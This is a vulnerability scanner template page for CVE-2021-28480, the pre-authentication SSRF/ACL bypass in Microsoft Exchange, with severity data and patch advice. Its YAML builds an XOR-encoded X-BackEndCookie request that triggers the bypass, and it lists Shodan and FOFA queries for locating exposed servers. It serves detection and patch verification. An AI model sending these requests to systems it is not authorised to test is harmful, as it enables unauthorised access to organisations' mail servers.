Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
CVE-2021-28480
Verified
Description
Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
Severity
Critical
CVSS Score
9.8
Exploit Probability
87%
Affected Product
exchange_server
Published Date
January 20, 2026
Template Author
daffainfo
CVE-2021-28480.yaml
id: CVE-2021-28480
info:
name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
author: daffainfo
severity: critical
description: |
Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
impact: |
Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
remediation: |
Apply the latest security patches and updates provided by Microsoft for Exchange Server
reference:
- https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
- https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
- https://www.youtube.com/watch?v=vn4niT9XEIM
- https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480
- https://nvd.nist.gov/vuln/detail/cve-2021-28480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-28480
cwe-id: D-CWE-noinfo
epss-score: 0.87144
epss-percentile: 0.99458
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: exchange_server
shodan-query:
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query:
- title="outlook"
- icon_hash=1768726119
google-query: intitle:"outlook"
tags: cve,cve2021,ssrf,rce,exchange,microsoft
variables:
email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
epoch: '{{unix_time()}}'
date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'
flow: |
http(1)
let servername = template.servername;
let epoch = template.epoch;
let date = template.date;
let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/?a.a#~" + epoch + "~" + date;
let result = "";
for (let i = 0; i < str.length; i++) {
let xorChar = str.charCodeAt(i) ^ 0xff;
result += xorChar.toString(16).padStart(2, "0");
}
set("rawXor", result);
http(2)
http:
- raw:
- |
GET /owa/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(to_lower(header), "x-feserver")'
condition: and
internal: true
extractors:
- type: kval
name: servername
kval:
- x_feserver
internal: true
- raw:
- |
GET /owa/calendar/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
X-AnchorMailbox: {{email}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "NT+AUTHORITY"
- "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
condition: and
- type: status
status:
- 302
# digest: 490a00463044022007403e8223be9544fd39a78aab95d13081ec3d25abed780c499b59daac7b85480220786712957ce7c15c92d35463cc0b2e54dd94a92e36a2b598ee4a0249e5efc020:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2021-28480
CWE ID:
d-cwe-noinfo
References
https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdfhttps://www.youtube.com/watch?v=vn4niT9XEIMhttps://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480https://nvd.nist.gov/vuln/detail/cve-2021-28480
Remediation Steps
Apply the latest security patches and updates provided by Microsoft for Exchange Server